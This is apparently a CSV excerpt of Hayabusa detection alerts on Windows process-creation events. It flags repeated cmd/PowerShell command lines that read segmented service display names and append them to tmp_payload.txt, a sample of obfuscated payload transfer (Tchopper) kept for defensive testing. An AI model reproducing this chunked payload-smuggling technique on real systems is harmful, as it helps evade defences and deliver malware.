2021-11-03 17:38:53.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:55.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:55.114 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:56.538 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:56.554 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe4c | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:58.007 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:38:59.462 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:00.900 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x470 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:02.337 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:03.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xabc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:06.713 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:06.728 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:11.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xed4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:11.124 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:14.049 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:14.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:15.496 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:15.511 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6fc | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:19.854 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:19.869 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x32c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:25.692 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:25.708 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab4 | User: FS03$ | LID: 
